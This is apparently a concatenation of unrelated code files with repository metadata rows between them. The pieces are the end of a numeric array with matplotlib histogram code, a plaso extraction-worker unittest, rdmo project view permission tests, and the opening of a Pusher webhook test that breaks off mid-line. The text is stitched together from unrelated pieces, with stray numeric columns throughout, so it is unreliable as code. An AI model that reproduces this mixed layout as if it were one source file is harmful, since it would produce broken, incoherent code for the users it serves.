[10.5295359251904, 4.913327175929032],
[9.562013253827118, 1.382481055479219],
[11.136964472776878, 4.9173911163438655],
[9.313523271207726, 7.409010602010248],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[10.635474900732435, 4.557320597258936],
[12.543458707847805, 5.100990892907957],
[14.061529712863761, 4.184586609941457],
[9.046138685340281, 4.4989558659515545],
[10.5295359251904, 4.913327175929032],
[11.854118699116208, 4.376073110005652],
[9.093734478018916, 5.639890645533],
[12.543458707847805, 5.100990892907957],
[7.400504118242411, 3.9849382544120675],
[9.046138685340281, 4.4989558659515545],
[10.5295359251904, 4.913327175929032],
[34.23962980612289, 5.724098619097325],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[10.635474900732435, 4.557320597258936],
[13.38441619590509, 4.458076240550244],
[9.046138685340281, 4.4989558659515545],
[10.5295359251904, 4.913327175929032],
[10.627155716160557, 4.390483829087929],
[11.854118699116208, 4.376073110005652],
[7.400504118242411, 3.9849382544120675],
[7.648743254380252, 3.257370873095939],
[15.006366271051672, 4.232282823070333],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[10.627155716160557, 4.390483829087929],
[22.01908128270974, 3.805279465650763],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.54798198686671, 4.392237959001067],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[6.318696553751853, 2.6493957765030025],
[6.925060823285094, 3.9322925779230595],
[7.757238842667287, 3.6066908442572694],
[12.390006549779804, 2.8565142569979605],
[11.052943486906425, 4.056670488652025],
[7.868234704679868, 6.1038468248930515],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[9.228222681876002, 4.707914178930707],
[9.70851317614466, 6.764568760710533]
]
# Plot a histogram of the second column of measurements_mean_std (defined
# above) — per the title, the standard deviations of neighboring angles.
d = [e[1] for e in measurements_mean_std]
# An "interface" to matplotlib.axes.Axes.hist() method
n, bins, patches = plt.hist(x=d, bins='auto', color='#0504aa',
                            alpha=0.7, rwidth=0.85)
plt.grid(axis='y', alpha=0.75)
# The plotted values are standard deviations, so the axis label is sigma;
# sigma^2 would denote the variance.
plt.xlabel('Std $\\sigma$')
plt.ylabel('Frequency')
plt.title('Histogram of neighboring angles standard deviation')
maxfreq = n.max()
# Set a clean upper y-axis limit: round up to the next multiple of 10.
# NOTE: the ymax= keyword was removed in Matplotlib 3.0; top= is the
# supported spelling.
plt.ylim(top=np.ceil(maxfreq / 10) * 10 if maxfreq % 10 else maxfreq + 10)
plt.show()
| 41.354908
| 75
| 0.782293
| 7,431
| 76,672
| 8.071054
| 0.069843
| 0.004002
| 0.004252
| 0.008253
| 0.906813
| 0.852291
| 0.852291
| 0.852291
| 0.653411
| 0.594655
| 0
| 0.838389
| 0.073038
| 76,672
| 1,854
| 76
| 41.354908
| 0.005487
| 0.00133
| 0
| 0.984832
| 0
| 0
| 0.001293
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001083
| 0
| 0.001083
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4e9569d90c12a42bbd55b6f51dc2c6ae5db64c33
| 7,137
|
py
|
Python
|
tests/engine/worker.py
|
Defense-Cyber-Crime-Center/plaso
|
4f3a85fbea10637c1cdbf0cde9fc539fdcea9c47
|
[
"Apache-2.0"
] | 2
|
2016-02-18T12:46:29.000Z
|
2022-03-13T03:04:59.000Z
|
tests/engine/worker.py
|
Defense-Cyber-Crime-Center/plaso
|
4f3a85fbea10637c1cdbf0cde9fc539fdcea9c47
|
[
"Apache-2.0"
] | null | null | null |
tests/engine/worker.py
|
Defense-Cyber-Crime-Center/plaso
|
4f3a85fbea10637c1cdbf0cde9fc539fdcea9c47
|
[
"Apache-2.0"
] | 6
|
2016-12-18T08:05:36.000Z
|
2021-04-06T14:19:11.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests the worker."""
import unittest
from dfvfs.lib import definitions as dfvfs_definitions
from dfvfs.path import factory as path_spec_factory
from dfvfs.resolver import context
from plaso.engine import knowledge_base
from plaso.engine import single_process
from plaso.engine import worker
from plaso.parsers import mediator as parsers_mediator
from tests.engine import test_lib
class BaseEventExtractionWorkerTest(test_lib.EngineTestCase):
"""Tests for the worker object."""
def testExtractionWorker(self):
"""Tests the extraction worker functionality."""
path_spec_queue = single_process.SingleProcessQueue()
event_object_queue = single_process.SingleProcessQueue()
parse_error_queue = single_process.SingleProcessQueue()
event_queue_producer = single_process.SingleProcessItemQueueProducer(
event_object_queue)
parse_error_queue_producer = single_process.SingleProcessItemQueueProducer(
parse_error_queue)
knowledge_base_object = knowledge_base.KnowledgeBase()
parser_mediator = parsers_mediator.ParserMediator(
event_queue_producer, parse_error_queue_producer,
knowledge_base_object)
resolver_context = context.Context()
extraction_worker = worker.BaseEventExtractionWorker(
0, path_spec_queue, event_queue_producer, parse_error_queue_producer,
parser_mediator, resolver_context=resolver_context)
self.assertNotEqual(extraction_worker, None)
extraction_worker.InitializeParserObjects()
# Process a file.
source_path = self._GetTestFilePath([u'syslog'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 16)
# Process a compressed file.
source_path = self._GetTestFilePath([u'syslog.gz'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 16)
source_path = self._GetTestFilePath([u'syslog.bz2'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 15)
# Process a file in an archive.
source_path = self._GetTestFilePath([u'syslog.tar'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_TAR, location=u'/syslog',
parent=path_spec)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 13)
# Process an archive file without "process archive files" mode.
extraction_worker.SetProcessArchiveFiles(False)
source_path = self._GetTestFilePath([u'syslog.tar'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 3)
# Process an archive file with "process archive files" mode.
extraction_worker.SetProcessArchiveFiles(True)
source_path = self._GetTestFilePath([u'syslog.tar'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 16)
# Process a file in a compressed archive.
source_path = self._GetTestFilePath([u'syslog.tgz'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_GZIP, parent=path_spec)
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_TAR, location=u'/syslog',
parent=path_spec)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 13)
# Process an archive file with "process archive files" mode.
extraction_worker.SetProcessArchiveFiles(True)
source_path = self._GetTestFilePath([u'syslog.tgz'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 17)
def testExtractionWorkerHashing(self):
  """Test that the worker sets up and runs hashing code correctly."""
  # Build the three queues the worker wires together: input path specs,
  # extracted event objects and parse errors.
  path_spec_queue = single_process.SingleProcessQueue()
  event_object_queue = single_process.SingleProcessQueue()
  parse_error_queue = single_process.SingleProcessQueue()
  event_queue_producer = single_process.SingleProcessItemQueueProducer(
      event_object_queue)
  parse_error_queue_producer = single_process.SingleProcessItemQueueProducer(
      parse_error_queue)
  knowledge_base_object = knowledge_base.KnowledgeBase()
  # The mediator gives parsers access to the producers and knowledge base.
  parser_mediator = parsers_mediator.ParserMediator(
      event_queue_producer, parse_error_queue_producer,
      knowledge_base_object)
  resolver_context = context.Context()
  # Worker identifier 0; only a single worker is needed for this check.
  extraction_worker = worker.BaseEventExtractionWorker(
      0, path_spec_queue, event_queue_producer, parse_error_queue_producer,
      parser_mediator, resolver_context=resolver_context)
  # We're going to check that the worker set up its internal state correctly.
  # pylint: disable=protected-access
  extraction_worker.SetHashers(hasher_names_string=u'md5')
  # Requesting a single hasher (md5) must register exactly one hasher name.
  self.assertEqual(1, len(extraction_worker._hasher_names))
  extraction_worker.InitializeParserObjects()
if __name__ == '__main__':
  # Allow running this test module directly with the unittest runner.
  unittest.main()
| 36.045455
| 79
| 0.781281
| 845
| 7,137
| 6.209467
| 0.152663
| 0.070135
| 0.077759
| 0.042691
| 0.816848
| 0.81418
| 0.807318
| 0.777778
| 0.777778
| 0.777778
| 0
| 0.00344
| 0.144739
| 7,137
| 197
| 80
| 36.228426
| 0.85616
| 0.082668
| 0
| 0.798387
| 0
| 0
| 0.015347
| 0
| 0
| 0
| 0
| 0
| 0.080645
| 1
| 0.016129
| false
| 0
| 0.072581
| 0
| 0.096774
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ed39189f6f4f17e55e2a6b324e7623e1bdbc6b6
| 22,246
|
py
|
Python
|
rdmo/projects/tests/test_view_project.py
|
m6121/rdmo
|
db3990c7525138c6ce9634fc3e5b6b8ee9b915c8
|
[
"Apache-2.0"
] | null | null | null |
rdmo/projects/tests/test_view_project.py
|
m6121/rdmo
|
db3990c7525138c6ce9634fc3e5b6b8ee9b915c8
|
[
"Apache-2.0"
] | null | null | null |
rdmo/projects/tests/test_view_project.py
|
m6121/rdmo
|
db3990c7525138c6ce9634fc3e5b6b8ee9b915c8
|
[
"Apache-2.0"
] | null | null | null |
import re
import pytest
from django.urls import reverse
from rdmo.views.models import View
from ..models import Project
# (username, password) pairs for each parametrized login; the anonymous
# user has no password and is therefore never logged in by client.login().
users = (
    ('owner', 'owner'),
    ('manager', 'manager'),
    ('author', 'author'),
    ('guest', 'guest'),
    ('user', 'user'),
    ('site', 'site'),
    ('anonymous', None),
)

# Project ids each role is allowed to view.
# NOTE(review): the id sets presumably mirror the test fixtures — confirm.
view_project_permission_map = {
    'owner': [1, 2, 3, 4, 5],
    'manager': [1, 3, 5, 7],
    'author': [1, 3, 5, 8],
    'guest': [1, 3, 5, 9],
    'api': [1, 2, 3, 4, 5],
    'site': [1, 2, 3, 4, 5, 6, 7, 8, 9]
}

# Project ids each role is allowed to change (update views).
change_project_permission_map = {
    'owner': [1, 2, 3, 4, 5],
    'manager': [1, 3, 5, 7],
    'api': [1, 2, 3, 4, 5],
    'site': [1, 2, 3, 4, 5, 6, 7, 8, 9]
}

# Project ids each role is allowed to delete.
delete_project_permission_map = {
    'owner': [1, 2, 3, 4, 5],
    'api': [1, 2, 3, 4, 5],
    'site': [1, 2, 3, 4, 5, 6, 7, 8, 9]
}

# Project ids each role is allowed to export.
export_project_permission_map = {
    'owner': [1, 2, 3, 4, 5],
    'manager': [1, 3, 5, 7],
    'api': [1, 2, 3, 4, 5],
    'site': [1, 2, 3, 4, 5, 6, 7, 8, 9]
}

# All project ids exercised by the parametrized tests.
projects = [1, 2, 3, 4, 5, 6, 7, 8, 9]

# Export formats accepted by the answers/view export endpoints.
export_formats = ('rtf', 'odt', 'docx', 'html', 'markdown', 'tex', 'pdf')

site_id = 1            # NOTE(review): presumably the django.contrib.sites id — confirm
parent_project_id = 1  # project used as parent in create/update tests
catalog_id = 1         # catalog assigned to newly created projects
@pytest.mark.parametrize('username,password', users)
def test_list(db, client, username, password):
    """The project list page shows exactly the projects the user may view."""
    client.login(username=username, password=password)
    response = client.get(reverse('projects'))
    found_ids = re.findall(r'/projects/(\d+)/', response.content.decode())

    if not password:
        assert response.status_code == 302  # anonymous -> login redirect
        return
    assert response.status_code == 200
    if username == 'site':
        assert found_ids == []
    else:
        assert sorted({int(pk) for pk in found_ids}) \
            == view_project_permission_map.get(username, [])
@pytest.mark.parametrize('username,password', users)
def test_site(db, client, username, password):
    """Only the 'site' user may list all projects of the site."""
    client.login(username=username, password=password)
    response = client.get(reverse('site_projects'))
    found_ids = re.findall(r'/projects/(\d+)/update/', response.content.decode())

    if username == 'site':
        assert sorted(int(pk) for pk in found_ids) \
            == view_project_permission_map.get(username, [])
    elif password:
        assert response.status_code == 403
    else:
        assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_detail(db, client, username, password, project_id):
    """GET the project detail page; access follows the view permission map."""
    client.login(username=username, password=password)
    response = client.get(reverse('project', args=[project_id]))

    if project_id in view_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403  # authenticated but not allowed
    else:
        expected = 302  # anonymous -> redirect to login
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
def test_project_create_get(db, client, username, password):
    """The create form is visible to any authenticated user."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_create'))

    if not password:
        assert response.status_code == 302
        return
    assert response.status_code == 200
    # every option in the parent dropdown must be a project the user may view
    visible = view_project_permission_map.get(username, [])
    for option in re.findall(r'<option value="(\d+)"', response.content.decode()):
        assert int(option) in visible
@pytest.mark.parametrize('username,password', users)
def test_project_create_post(db, client, username, password):
    """POSTing the create form adds a project only for authenticated users."""
    client.login(username=username, password=password)
    count_before = Project.objects.count()
    response = client.post(reverse('project_create'), {
        'title': 'A new project',
        'description': 'Some description',
        'catalog': catalog_id
    })

    # both outcomes redirect: to the new project, or to the login page
    assert response.status_code == 302
    expected_count = count_before + 1 if password else count_before
    assert Project.objects.count() == expected_count
@pytest.mark.parametrize('username,password', users)
def test_project_create_parent_post(db, client, username, password):
    """Creating a project with a parent fails for users without access to it."""
    client.login(username=username, password=password)
    count_before = Project.objects.count()
    data = {
        'title': 'A new project',
        'description': 'Some description',
        'catalog': catalog_id,
        'parent': parent_project_id
    }
    response = client.post(reverse('project_create'), data)

    if username == 'user':
        # form is re-rendered with an error; nothing is saved
        assert response.status_code == 200
        assert Project.objects.count() == count_before
    elif password:
        assert response.status_code == 302
        assert Project.objects.count() == count_before + 1
    else:
        assert response.status_code == 302
        assert Project.objects.count() == count_before
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_get(db, client, username, password, project_id):
    """GET the update form; only users with change permission may see it."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_update', args=[project_id]))

    if project_id in change_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_post(db, client, username, password, project_id):
    """POSTing a new title changes it only for users with change permission."""
    client.login(username=username, password=password)
    project = Project.objects.get(pk=project_id)
    data = {
        'title': 'New title',
        'description': project.description,
        'catalog': project.catalog.pk
    }
    response = client.post(reverse('project_update', args=[project_id]), data)

    if project_id in change_project_permission_map.get(username, []):
        assert response.status_code == 302
        assert Project.objects.get(pk=project_id).title == 'New title'
    else:
        assert response.status_code == (403 if password else 302)
        assert Project.objects.get(pk=project_id).title == project.title
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_post_parent(db, client, username, password, project_id):
    """Setting a parent via the update form; a project cannot be its own parent."""
    client.login(username=username, password=password)
    project = Project.objects.get(pk=project_id)
    data = {
        'title': project.title,
        'description': project.description,
        'catalog': project.catalog.pk,
        'parent': parent_project_id
    }
    response = client.post(reverse('project_update', args=[project_id]), data)

    if project_id in change_project_permission_map.get(username, []):
        if project_id == parent_project_id:
            # self-parenting: form error, nothing saved
            assert response.status_code == 200
            assert Project.objects.get(pk=project_id).parent == project.parent
        else:
            assert response.status_code == 302
            assert Project.objects.get(pk=project_id).parent_id == parent_project_id
    else:
        assert response.status_code == (403 if password else 302)
        assert Project.objects.get(pk=project_id).parent == project.parent
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_information_get(db, client, username, password, project_id):
    """GET the information update form; requires change permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_update_information', args=[project_id]))

    if project_id in change_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_information_post(db, client, username, password, project_id):
    """POST new title/description; saved only with change permission."""
    client.login(username=username, password=password)
    project = Project.objects.get(pk=project_id)
    data = {
        'title': 'Lorem ipsum dolor sit amet',
        'description': 'At vero eos et accusam et justo duo dolores et ea rebum.'
    }
    response = client.post(reverse('project_update_information', args=[project_id]), data)

    if project_id in change_project_permission_map.get(username, []):
        assert response.status_code == 302
        assert Project.objects.get(pk=project_id).title == 'Lorem ipsum dolor sit amet'
    else:
        assert response.status_code == (403 if password else 302)
        assert Project.objects.get(pk=project_id).title == project.title
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_catalog_get(db, client, username, password, project_id):
    """GET the catalog update form; requires change permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_update_catalog', args=[project_id]))

    if project_id in change_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_catalog_post(db, client, username, password, project_id):
    """POST a catalog change; saved only with change permission."""
    client.login(username=username, password=password)
    project = Project.objects.get(pk=project_id)
    response = client.post(
        reverse('project_update_catalog', args=[project_id]),
        {'catalog': catalog_id}
    )

    if project_id in change_project_permission_map.get(username, []):
        assert response.status_code == 302
        assert Project.objects.get(pk=project_id).catalog_id == catalog_id
    else:
        assert response.status_code == (403 if password else 302)
        assert Project.objects.get(pk=project_id).catalog == project.catalog
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_tasks_get(db, client, username, password, project_id):
    """GET the tasks update form; requires change permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_update_tasks', args=[project_id]))

    if project_id in change_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_tasks_post(db, client, username, password, project_id):
    """POST an empty task list; cleared only with change permission."""
    client.login(username=username, password=password)
    project = Project.objects.get(pk=project_id)
    response = client.post(
        reverse('project_update_tasks', args=[project_id]),
        {'tasks': []}
    )

    if project_id in change_project_permission_map.get(username, []):
        assert response.status_code == 302
        assert list(Project.objects.get(pk=project_id).tasks.values('id')) == []
    else:
        assert response.status_code == (403 if password else 302)
        assert list(Project.objects.get(pk=project_id).tasks.values('id')) == list(project.tasks.values('id'))
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_views_get(db, client, username, password, project_id):
    """GET the views update form; requires change permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_update_views', args=[project_id]))

    if project_id in change_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_views_post(db, client, username, password, project_id):
    """POST an empty view list; cleared only with change permission."""
    client.login(username=username, password=password)
    project = Project.objects.get(pk=project_id)
    response = client.post(
        reverse('project_update_views', args=[project_id]),
        {'views': []}
    )

    if project_id in change_project_permission_map.get(username, []):
        assert response.status_code == 302
        assert list(Project.objects.get(pk=project_id).views.values('id')) == []
    else:
        assert response.status_code == (403 if password else 302)
        assert list(Project.objects.get(pk=project_id).views.values('id')) == list(project.views.values('id'))
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_parent_get(db, client, username, password, project_id):
    """GET the parent update form; requires change permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_update_parent', args=[project_id]))

    if project_id in change_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_parent_post(db, client, username, password, project_id):
    """POST a parent change; a project cannot become its own parent."""
    client.login(username=username, password=password)
    project = Project.objects.get(pk=project_id)
    response = client.post(
        reverse('project_update_parent', args=[project_id]),
        {'parent': parent_project_id}
    )

    if project_id in change_project_permission_map.get(username, []):
        if project_id == parent_project_id:
            # self-parenting: form error, nothing saved
            assert response.status_code == 200
            assert Project.objects.get(pk=project_id).parent == project.parent
        else:
            assert response.status_code == 302
            assert Project.objects.get(pk=project_id).parent_id == parent_project_id
    else:
        assert response.status_code == (403 if password else 302)
        assert Project.objects.get(pk=project_id).parent == project.parent
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_delete_get(db, client, username, password, project_id):
    """GET the delete confirmation page; requires delete permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_delete', args=[project_id]))

    if project_id in delete_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_delete_post(db, client, username, password, project_id):
    """POST a delete; the project disappears only with delete permission."""
    client.login(username=username, password=password)
    response = client.post(reverse('project_delete', args=[project_id]))

    if project_id in delete_project_permission_map.get(username, []):
        assert response.status_code == 302
        assert not Project.objects.filter(pk=project_id).first()
    else:
        assert response.status_code == (403 if password else 302)
        assert Project.objects.filter(pk=project_id).first()
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_export_xml(db, client, files, username, password, project_id):
    """Export a project as XML; requires export permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_export', args=[project_id, 'xml']))

    if project_id in export_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_export_csv(db, client, username, password, project_id):
    """Export a project as comma-separated CSV; requires export permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_export', args=[project_id, 'csvcomma']))

    if project_id in export_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_export_csvsemicolon(db, client, username, password, project_id):
    """Export a project as semicolon-separated CSV; requires export permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_export', args=[project_id, 'csvsemicolon']))

    if project_id in export_project_permission_map.get(username, []):
        expected = 200
    elif password:
        expected = 403
    else:
        expected = 302
    assert response.status_code == expected
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_answers(db, client, username, password, project_id):
    """GET the answers page; requires view permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_answers', args=[project_id]))

    allowed = project_id in view_project_permission_map.get(username, [])
    assert response.status_code == (200 if allowed else 403 if password else 302)
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
@pytest.mark.parametrize('export_format', export_formats)
def test_project_answers_export(db, client, username, password, project_id, export_format):
    """Export the answers in every supported format; requires view permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_answers_export', args=[project_id, export_format]))

    allowed = project_id in view_project_permission_map.get(username, [])
    assert response.status_code == (200 if allowed else 403 if password else 302)
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_view(db, client, username, password, project_id):
    """Rendering a view: 404 unless the view is assigned to the project."""
    client.login(username=username, password=password)
    assigned_views = Project.objects.get(pk=project_id).views.all()

    for view in View.objects.all():
        response = client.get(reverse('project_view', args=[project_id, view.id]))
        if project_id not in view_project_permission_map.get(username, []):
            assert response.status_code == (403 if password else 302)
        elif view in assigned_views:
            assert response.status_code == 200
        else:
            assert response.status_code == 404
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
@pytest.mark.parametrize('export_format', export_formats)
def test_project_view_export(db, client, username, password, project_id, export_format):
    """Exporting a view: 404 unless the view is assigned to the project."""
    client.login(username=username, password=password)
    assigned_views = Project.objects.get(pk=project_id).views.all()

    for view in View.objects.all():
        response = client.get(reverse('project_view_export', args=[project_id, view.pk, export_format]))
        if project_id not in view_project_permission_map.get(username, []):
            assert response.status_code == (403 if password else 302)
        elif view in assigned_views:
            assert response.status_code == 200
        else:
            assert response.status_code == 404
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_questions(db, client, username, password, project_id):
    """GET the interview/questions page; requires view permission."""
    client.login(username=username, password=password)
    response = client.get(reverse('project_questions', args=[project_id]))

    allowed = project_id in view_project_permission_map.get(username, [])
    assert response.status_code == (200 if allowed else 403 if password else 302)
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_error(db, client, username, password, project_id):
    """GET the questions page again under the 'error' test name.

    NOTE(review): this is byte-for-byte the same request as
    test_project_questions ('project_questions' URL) — presumably it was
    meant to exercise an error URL; confirm and adjust with the authors.
    """
    client.login(username=username, password=password)
    response = client.get(reverse('project_questions', args=[project_id]))

    allowed = project_id in view_project_permission_map.get(username, [])
    assert response.status_code == (200 if allowed else 403 if password else 302)
| 33.757208
| 110
| 0.673964
| 2,728
| 22,246
| 5.313416
| 0.048387
| 0.088789
| 0.124181
| 0.149017
| 0.940738
| 0.938875
| 0.933356
| 0.92425
| 0.900586
| 0.894446
| 0
| 0.021531
| 0.206644
| 22,246
| 658
| 111
| 33.808511
| 0.799762
| 0.001438
| 0
| 0.793774
| 0
| 0
| 0.085584
| 0.008239
| 0
| 0
| 0
| 0
| 0.227626
| 1
| 0.058366
| false
| 0.233463
| 0.009728
| 0
| 0.068093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0920fdaff0e8ab40f9315b77f6667b6c1bba67a7
| 5,400
|
py
|
Python
|
app/tests/routers/test_webhooks.py
|
kalaspuff/newshades-api
|
e22a8875b6e50f71e67dfdaf7b1b3e85817fb5b9
|
[
"CC0-1.0"
] | null | null | null |
app/tests/routers/test_webhooks.py
|
kalaspuff/newshades-api
|
e22a8875b6e50f71e67dfdaf7b1b3e85817fb5b9
|
[
"CC0-1.0"
] | null | null | null |
app/tests/routers/test_webhooks.py
|
kalaspuff/newshades-api
|
e22a8875b6e50f71e67dfdaf7b1b3e85817fb5b9
|
[
"CC0-1.0"
] | null | null | null |
import asyncio
import hashlib
import hmac
import json
import random
import time
import arrow
import pytest
from fastapi import FastAPI
from httpx import AsyncClient
from pymongo.database import Database
from app.config import get_settings
from app.models.user import User
class TestWebhookRoutes:
    """Integration tests for the Pusher presence webhook (/webhooks/pusher)."""

    @staticmethod
    def _pusher_headers(settings, json_data, *, key=None, signature_suffix=""):
        """Return the X-Pusher-* headers Pusher would send for *json_data*.

        The signature is the hex HMAC-SHA256 of the JSON-encoded body keyed
        with the configured Pusher secret.  *key* overrides the app key and
        *signature_suffix* corrupts the signature — both for negative tests.
        """
        signature = hmac.new(
            settings.pusher_secret.encode("utf8"),
